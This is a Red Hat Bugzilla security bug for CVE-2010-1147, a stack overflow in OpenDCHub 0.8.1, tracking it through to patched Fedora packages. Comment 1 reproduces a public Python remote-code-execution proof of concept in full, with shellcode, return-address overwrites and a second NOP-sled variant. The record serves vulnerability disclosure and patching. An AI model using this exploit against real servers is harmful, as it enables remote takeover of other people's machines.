Bug 579206 - (CVE-2010-1147) CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafte...
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
http://www.indahax.com/exploits/opend...
impact=moderate,source=debian,reporte...
: Security
Depends On: 579207
Blocks:
  Show dependency treegraph
 
Reported: 2010-04-03 05:11 EDT by Jan Lieskovsky
Modified: 2010-04-30 13:18 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)

  None (edit)
Description Jan Lieskovsky 2010-04-03 05:11:37 EDT
Pierre Nogues found a stack overflow flaw, in the way Open DC Hub
sanitized content of user's MyINFO message. Remote attacker, 
with valid Open DC Hub account, could send a specially-crafted
MyINFO message to another user / all users connected to particular
Direct Connect network, leading into denial of service (opendchub
crash) or, potentially, to arbitrary code execution with the privileges
of the user running opendchub.

References:
  [1] http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
  [2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308

CVE Request:
  [3] http://www.openwall.com/lists/oss-security/2010/04/03/1
Comment 1 Jan Lieskovsky 2010-04-03 05:13:08 EDT
Public PoCs by Pierre posted in [1]:

#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
#     OpenDcHub is a direct connect hub for Linux
#
#     OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
#     OpenDcHub 0.8.1
#
# Plateforms :
#     Unix
#
# Usage :
#     ./exploit.py
 
import socket
 
host = '192.168.1.9'
port = 5000
 
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24" 
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d" 
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75" 
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2" 
shellcode+="\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc" 
shellcode+="\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29" 
shellcode+="\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b" 
shellcode+="\x2b"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")
 
hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
    hax+="A"
hax+="$"
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
hax+="S:-1|"
 
s.send(hax)
s.close()
 
"""
# V2
# more complex version working too, it have more space for the shellcode
 
hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+=shellcode
hax+="|"
"""
Comment 2 Jan Lieskovsky 2010-04-03 05:14:30 EDT
This issue affects the versions of the opendchub package,
as shipped with Fedora releases of 11 and 12.

Please fix.
Comment 4 Jan Lieskovsky 2010-04-06 03:40:05 EDT
This is CVE-2010-1147.
Comment 5 Roshan Singh 2010-04-08 13:56:51 EDT
I have fixed the bug, and created the RPM, but I forgot to put the CVE ids in the RPM changelog. Do I need to recreate the RPM ?
Comment 6 Jan Lieskovsky 2010-04-08 14:13:58 EDT
Hi Roshan,

  I can see "- New release with fix for buffer overflow" in
the Changelog, which should be sufficient. (some further
guide information is available also here:
  [1] https://bugzilla.redhat.com/show_bug.cgi?id=579207#c0)

But please, by submitting request to Bodhi, be sure to 
mention the "CVE-2010-1147" identifier in the "Update Information"
field, together with #579206 (this bug) within the "Bugs Fixed"
field.

Thanks && Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team
Comment 7 Fedora Update System 2010-04-08 14:29:28 EDT
opendchub-0.8.2-1.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc11
Comment 8 Fedora Update System 2010-04-08 14:30:31 EDT
opendchub-0.8.2-1.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc12
Comment 9 Fedora Update System 2010-04-08 14:31:49 EDT
opendchub-0.8.2-1.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc13
Comment 10 Roshan Singh 2010-04-09 00:26:58 EDT
I have deleted these updates, I had uploaded the wrong tar ball to sourceforge, luckily nobody had downloaded it till then, I will update the RPM by today.

I am sorry for the inconvenience.
Comment 11 Fedora Update System 2010-04-10 13:25:09 EDT
opendchub-0.8.2-2.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc12
Comment 12 Fedora Update System 2010-04-10 13:25:13 EDT
opendchub-0.8.2-2.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc11
Comment 13 Fedora Update System 2010-04-10 13:25:17 EDT
opendchub-0.8.2-2.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc13
Comment 14 Fedora Update System 2010-04-30 13:10:57 EDT
opendchub-0.8.2-2.fc12 has been pushed to the Fedora 12 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 15 Fedora Update System 2010-04-30 13:18:50 EDT
opendchub-0.8.2-2.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.

Note You need to log in before you can comment on or make changes to this bug.